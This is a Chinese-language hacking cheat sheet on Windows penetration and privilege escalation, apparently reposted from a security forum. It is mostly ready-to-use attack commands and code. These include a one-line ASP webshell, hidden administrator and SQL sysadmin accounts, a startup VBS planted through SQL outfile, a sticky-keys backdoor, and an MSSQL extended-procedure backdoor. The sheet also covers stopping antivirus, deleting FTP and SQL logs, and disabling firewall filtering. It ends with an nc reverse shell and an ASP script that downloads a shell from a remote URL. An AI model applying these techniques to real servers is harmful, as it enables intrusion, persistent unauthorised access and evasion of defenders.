精选栏目: 装机必备 专题大全 常用工具 系统集锦

Windows渗透与提权:技巧总结篇

栏目: 安全资讯 已有人学习|编辑:admin; 来源:;
旁站路径问题:
 
1、读网站配置。
 
2、用以下VBS:
  
On Error Resume Next

If (LCase(Right(WScript.Fullname, 11)) = "wscript.exe") Then

MsgBox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & " Usage:Cscript vWeb.vbs", 4096, "Lilo"

WScript.Quit

End If

Set objservice = GetObject("IIS://LocalHost/W3SVC")

For Each obj3w In objservice

If IsNumeric(obj3w.Name) Then

Set OService = GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)

Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")

If Err <> 0 Then WScript.Quit (1)

WScript.Echo Chr(10) & "[" & OService.ServerComment & "]"

For Each Binds In OService.ServerBindings

Web = "{ " & Replace(Binds, ":", " } { ") & " }"

WScript.Echo Replace(Split(Replace(Web, " ", ""), "}{")(2), "}", "")

Next

WScript.Echo "Path            : " & VDirObj.Path

End If

Next

 
3、iis_spy 列举(注:需要支持ASPX,反IISSPY的方法:将 activeds.dll,activeds.tlb 降权)。
 
4、得到目标站目录,不能直接跨的。可以通过“echo  ^<%execute(request(“cmd”))%^> >>X:目标目录X.asp”或者“copy 脚本文件 X:目标目录X.asp”像目标目录写入webshell,或者还可以试试type命令。
 
网站可能目录(注:一般是类):
 data/htdocs.网站/网站/
 
CMD 下操作 VPN 相关知识、资料:
 
#允许administrator拨入该VPN:
  netsh ras set user administrator permit
 
#禁止administrator拨入该VPN:
 
  netsh ras set user administrator deny
 
#查看哪些用户可以拨入VPN:
 
  netsh ras show user
 
#查看VPN分配IP的方式:
 netsh ras ip show config
 
#使用地址池的方式分配IP:
  netsh ras ip set addrassign method = pool
 
#地址池的范围是从192.168.3.1到192.168.3.254:
  netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254
 
Cmd、Dos 命令行下添加 SQL 用户的方法:
 
需要有管理员权限,在命令下先建立一个“c:test.qry”文件,内容如下:
 
 
exec master.dbo.sp_addlogin test,123
EXEC sp_addsrvrolemember 'test, 'sysadmin'
 
然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:test.qry
 
另类的加用户方法:
 
在删掉了 net.exe 和不用 adsi 之外,新的加用户的方法。代码如下:
 
js:
 

var o=new ActiveXObject( "Shell.Users" );

z=o.create("test") ;

z.changePassword("123456","")

z.setting("AccountType")=3;
  vbs:
 
  
Set o=CreateObject( "Shell.Users" )

Set z=o.create("test")

z.changePassword "123456",""

z.setting("AccountType")=3

Cmd 访问控制权限控制:
 
命令如下:
 
  cacls c: /e /t /g everyone:F           #c盘everyone权限
 
  cacls "目录" /d everyone               #everyone不可读,包括admin
 
备注:
 
反制方法,在文件夹安全设置里将 Everyone 设定为不可读,如果没有安全性选项:工具 – 文件夹选项 – 使用简单的共享去掉即可。
 
3389 相关,以下配合PR更好:
 
a、防火墙TCP/IP筛选.(关闭:net stop policyagent & net stop sharedaccess)
 
b、内网环境(lcx.exe)
 
c、终端服务器超出了最大允许连接(XP 运行:mstsc /admin;2003 运行:mstsc /console)
 
1.查询终端端口:
 
  REG query HKLMSYSTEMCurrentControlSetControlTerminal" "ServerWinStationsRDP-Tcp /v PortNumber
 
2.开启XP&2003终端服务:
 
 
  REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
 
3.更改终端端口为2008(十六进制为:0x7d8):
 
 
 
  REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "ServerWdsrdpwdTdstcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
  REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "ServerWinStationsRDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
 
4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制:
  REG ADD HKLMSYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfileGloballyOpenPortsList /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled :@  xpsp2res.dll,-22009 /f
 
 
create table a (cmd text);

insert into a values ("set wshshell=createobject (""wscript.shell"")");

insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");

insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");

select * from a into outfile "C:Documents and SettingsAll Users「开始」菜单程序启动a.vbs";

 
BS马的PortMap功能,类似LCX做转发。若果支持ASPX,用这个转发会隐蔽点。(注:一直忽略了在偏僻角落的那个功能)
 
关闭常见杀软(把杀软所在的文件的所有权限去掉):
 
处理变态诺顿企业版:
 
  
create table a (cmd text);

insert into a values ("set wshshell=createobject (""wscript.shell"")");

insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");

insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");

select * from a into outfile "C:Documents and SettingsAll Users「开始」菜单程序启动a.vbs";

 
麦咖啡:
 net stop "McAfee McShield"
 
Symantec病毒日志:
 
  C:Documents and SettingsAll UsersApplication DataSymantecSymantec Endpoint ProtectionLogs
 
Symantec病毒备份:
 
  C:Documents and SettingsAll UsersApplication DataSymantecSymantec Endpoint ProtectionQuarantine
 
Nod32病毒备份:
 
 
  C:Docume~1AdministratorLocal SettingsApplication DataESETESET NOD32 AntivirusQuarantine
 
Nod32移除密码保护:
 
 删除“HKEY_LOCAL_MACHINESOFTWAREESETESET SecurityCurrentVersionInfoPackageID”即可
 
安装5次shift后门,沾滞键后门,替换SHIFT后门:
 
5次SHIFT,沾滞键后门:
  
copy %systemroot%system32sethc.exe %systemroot%system32dllcachesethc1.exe

copy %systemroot%system32cmd.exe %systemroot%system32dllcachesethc.exe /y

copy %systemroot%system32cmd.exe %systemroot%system32sethc.exe /y

 
替换SHIFT后门:
 
 
  
copy %systemroot%system32sethc.exe %systemroot%system32dllcachesethc1.exe

copy %systemroot%system32cmd.exe %systemroot%system32dllcachesethc.exe /y

copy %systemroot%system32cmd.exe %systemroot%system32sethc.exe /y

 
添加隐藏系统账号:
 
1、执行命令:“net user admin$ 123456 /add&net localgroup administrators admin$ /add”。
 
2、导出注册表SAM下用户的两个键值。
 
3、在用户管理界面里的 admin$ 删除,然后把备份的注册表导回去。
 
4、利用 Hacker Defender 把相关用户注册表隐藏。
 
安装 MSSQL 扩展后门:
 
 USE master;
 
 
 EXEC sp_addextendedproc 'xp_helpsystem', 'xp_helpsystem.dll';
 
 GRANT exec On xp_helpsystem TO public;
 
处理服务器MSFTP日志:
 
在“C:WINNTsystem32LogFilesMSFTPSVC1”下有 ex011120.log / ex011121.log / ex011124.log 三个文件,直接删除 ex0111124.log 不成功,显示“原文件…正在使用”。
 
当然可以直接删除“ex011120.log / ex011121.log”。然后用记事本打开“ex0111124.log”,删除里面的一些内容后,保存,覆盖退出,成功。
 
当停止“msftpsvc”服务后可直接删除“ex011124.log”。
 
MSSQL查询分析器连接记录清除:
 
MSSQL 2000 位于注册表如下:
 
  HKEY_CURRENT_USERSoftwareMicrosoftMicrosoft SQL Server80ToolsClientPrefServers
 
找到接接过的信息删除。
 
MSSQL 2005 是在:
  C:Documents and Settings<user>Application DataMicrosoftMicrosoft SQL Server90ToolsShellmru.dat
 
防BT系统拦截技巧,可以使用远程shell:
 
  
<%

Sub eWebEditor_SaveRemoteFile(s_LocalFileName, s_RemoteFileUrl)

Dim Ads, Retrieval, GetRemoteData

On Error Resume Next

Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP")

With Retrieval

.Open "Get", s_RemoteFileUrl, False, "", ""

.Send

GetRemoteData = .ResponseBody

End With

Set Retrieval = Nothing

Set Ads = Server.CreateObject("Adodb.Stream")

With Ads

.Type = 1

.Open

.Write GetRemoteData

.SaveToFile Server.MapPath(s_LocalFileName), 2

.Cancel()

.Close()

End With

Set Ads = Nothing

End Sub

eWebEditor_SaveRemoteFile "your shell's name", "your shell'urL"

%>

 
去除TCP IP筛选:
 
TCP/IP筛选在注册表里有三处,分别是:
 
 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesTcpip
 
 
 HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpip
 
  HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip
 
分别用以下命令来导出注册表项:
  regedit -e D:a.reg HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip
 regedit -e D:b.reg HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpip
regedit -e D:c.reg HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip
 
然后再把三个文件里的:
  “EnableSecurityFilters"=dword:00000001”
 
改为:
 “EnableSecurityFilters"=dword:00000000”
 
再将以上三个文件分别用以下命令导入注册表即可:
regedit -s D:a.reg
 regedit -s D:b.reg
 
regedit -s D:c.reg
 
Webshell 提权小技巧:
 
Cmd路径:
 c:windowstempcmd.exe
 
Nc 也在同目录下,例如反弹cmdshell:
 
  "c:windowstempnc.exe -vv ip 999 -e c:windowstempcmd.exe"
 
通常都不会成功。
 
而直接在 cmd 路径上输入:
 
 c:windowstempnc.exe
 
命令输入:
  -vv ip 999 -e c:windowstempcmd.exe
 
却能成功。。这个不是重点
 
我们通常执行 pr.exe 或 Churrasco.exe 的时候也需要按照上面的方法才能成功。
 
命令行调用 RAR 打包:
 
  rar a -k -r -s -m3 c:1.rar c:folde
 
看完了Windows版的,别错过linux版的哦。传送门:《linux与提权:技巧总结篇》
 
[via@0x / t00ls / lcx ]
收藏 赞() 踩()
本文地址:https://www.zhishiwu.com/hack/safe/17748.html
本文标签:Windows 渗透 技巧